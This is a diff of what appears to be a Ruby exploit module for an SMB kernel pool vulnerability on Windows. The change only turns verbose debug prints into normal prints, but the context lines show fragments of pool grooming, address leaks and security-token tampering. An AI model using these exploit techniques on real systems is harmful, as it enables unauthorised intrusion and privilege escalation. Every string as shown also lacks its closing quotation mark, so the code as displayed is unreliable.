@@ -94,11 +94,11 @@ def modify_token()
9494 secCtxAddr = sessionData [ @ctx [ 'SESSION_SECCTX_OFFSET' ] ..-1 ] . unpack ( @ctx [ 'PTR_FMT' ] ) [ 0 ]
9595
9696 if datastore [ 'DBGTRACE' ]
97- vprint_status ( "Session Data: #{ bin_to_hex ( sessionData ) } )
98- vprint_status ( "session dat len = #{ sessionData . length } )
99- vprint_status ( "Session ctx offset = #{ @ctx [ 'SESSION_SECCTX_OFFSET' ] . to_s ( 16 ) } )
100- vprint_status ( "Session ctx data = #{ bin_to_hex ( sessionData [ @ctx [ 'SESSION_SECCTX_OFFSET' ] ..-1 ] ) } )
101- vprint_status ( "secCtxAddr: #{ secCtxAddr . to_s ( 16 ) } )
97+ print_status ( "Session Data: #{ bin_to_hex ( sessionData ) } )
98+ print_status ( "session dat len = #{ sessionData . length } )
99+ print_status ( "Session ctx offset = #{ @ctx [ 'SESSION_SECCTX_OFFSET' ] . to_s ( 16 ) } )
100+ print_status ( "Session ctx data = #{ bin_to_hex ( sessionData [ @ctx [ 'SESSION_SECCTX_OFFSET' ] ..-1 ] ) } )
101+ print_status ( "secCtxAddr: #{ secCtxAddr . to_s ( 16 ) } )
102102 end
103103
104104 if @ctx . key? 'PCTXTHANDLE_TOKEN_OFFSET'
@@ -145,11 +145,11 @@ def modify_token()
145145 # the target can use PsImperonateClient for impersonation (Windows 2008 and later)
146146 # copy SecurityContext for restoration
147147 if datastore [ 'DBGTRACE' ]
148- vprint_status ( "Reading secCtxData from #{ secCtxAddr . to_s ( 16 ) } )
148+ print_status ( "Reading secCtxData from #{ secCtxAddr . to_s ( 16 ) } )
149149 end
150150 secCtxData = read_data ( secCtxAddr , @ctx [ 'SECCTX_SIZE' ] )
151151 if datastore [ 'DBGTRACE' ]
152- vprint_status ( "Read data from secCtx: #{ bin_to_hex ( secCtxData ) } )
152+ print_status ( "Read data from secCtx: #{ bin_to_hex ( secCtxData ) } )
153153 end
154154
155155 @ctx [ 'secCtxData' ] = secCtxData
@@ -297,8 +297,8 @@ def exploit_matched_pairs(pipe_handle)
297297
298298
299299 if datastore [ 'DBGTRACE' ]
300- vprint_status ( "GROOM_POOL_SIZE: 0x#{ @ctx [ 'GROOM_POOL_SIZE' ] . to_s ( 16 ) } )
301- vprint_status ( "BRIDE_TRANS_SIZE: 0x#{ @ctx [ 'BRIDE_TRANS_SIZE' ] . to_s ( 16 ) } )
300+ print_status ( "GROOM_POOL_SIZE: 0x#{ @ctx [ 'GROOM_POOL_SIZE' ] . to_s ( 16 ) } )
301+ print_status ( "BRIDE_TRANS_SIZE: 0x#{ @ctx [ 'BRIDE_TRANS_SIZE' ] . to_s ( 16 ) } )
302302 end
303303
304304 # bride paramters and data is alignment by 4 because it is TRANS
@@ -488,18 +488,18 @@ def align_transaction_and_leak(pipe_handle)
488488 leak_mid = leakTrans [ @ctx [ 'TRANS_MID_OFFSET' ] ..-1 ] . unpack ( "v" ) [ 0 ] #unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
489489
490490 if datastore [ 'DBGTRACE' ]
491- vprint_status ( "CONNECTION: 0x#{ connection_addr . to_s ( 16 ) } )
492- vprint_status ( "SESSION: 0x#{ session_addr . to_s ( 16 ) } )
493- vprint_status ( "FLINK: 0x#{ flink_value . to_s ( 16 ) } )
494- vprint_status ( "InParam: 0x#{ inparam_value . to_s ( 16 ) } )
495- vprint_status ( "MID: 0x#{ leak_mid . to_s ( 16 ) } )
491+ print_status ( "CONNECTION: 0x#{ connection_addr . to_s ( 16 ) } )
492+ print_status ( "SESSION: 0x#{ session_addr . to_s ( 16 ) } )
493+ print_status ( "FLINK: 0x#{ flink_value . to_s ( 16 ) } )
494+ print_status ( "InParam: 0x#{ inparam_value . to_s ( 16 ) } )
495+ print_status ( "MID: 0x#{ leak_mid . to_s ( 16 ) } )
496496 end
497497
498498 next_page_addr = ( inparam_value & 0xfffffffffffff000 ) + 0x1000
499499 if next_page_addr + @ctx [ 'GROOM_POOL_SIZE' ] + @ctx [ 'FRAG_POOL_SIZE' ] + @ctx [ 'POOL_ALIGN' ] + @ctx [ 'SRV_BUFHDR_SIZE' ] + @ctx [ 'TRANS_FLINK_OFFSET' ] != flink_value
500500 delta = flink_value - next_page_addr
501501 if datastore [ 'DBGTRACE' ]
502- vprint_error ( "Unexpected Flink alignment, delta: #{ delta . to_s ( 16 ) } )
502+ print_error ( "Unexpected Flink alignment, delta: #{ delta . to_s ( 16 ) } )
503503 end
504504 return nil
505505 end
@@ -701,13 +701,13 @@ def exploit_fish_barrel(pipe_handle)
701701 trans1_addr = trans2_addr - xTRANS_CHUNK_SIZE * 2
702702
703703 if datastore [ 'DBGTRACE' ]
704- vprint_status ( "CONNECTION: 0x#{ connection_addr . to_s ( 16 ) } )
705- vprint_status ( "SESSION: 0x#{ session_addr . to_s ( 16 ) } )
706- vprint_status ( "FLINK: 0x#{ flink_value . to_s ( 16 ) } )
707- vprint_status ( "InData: 0x#{ indata_value . to_s ( 16 ) } )
708- vprint_status ( "MID: 0x#{ trans2_mid . to_s ( 16 ) } )
709- vprint_status ( "TRANS1: 0x#{ trans1_addr . to_s ( 16 ) } )
710- vprint_status ( "TRANS2: 0x#{ trans2_addr . to_s ( 16 ) } )
704+ print_status ( "CONNECTION: 0x#{ connection_addr . to_s ( 16 ) } )
705+ print_status ( "SESSION: 0x#{ session_addr . to_s ( 16 ) } )
706+ print_status ( "FLINK: 0x#{ flink_value . to_s ( 16 ) } )
707+ print_status ( "InData: 0x#{ indata_value . to_s ( 16 ) } )
708+ print_status ( "MID: 0x#{ trans2_mid . to_s ( 16 ) } )
709+ print_status ( "TRANS1: 0x#{ trans1_addr . to_s ( 16 ) } )
710+ print_status ( "TRANS2: 0x#{ trans2_addr . to_s ( 16 ) } )
711711 end
712712
713713 # ================================
0 commit comments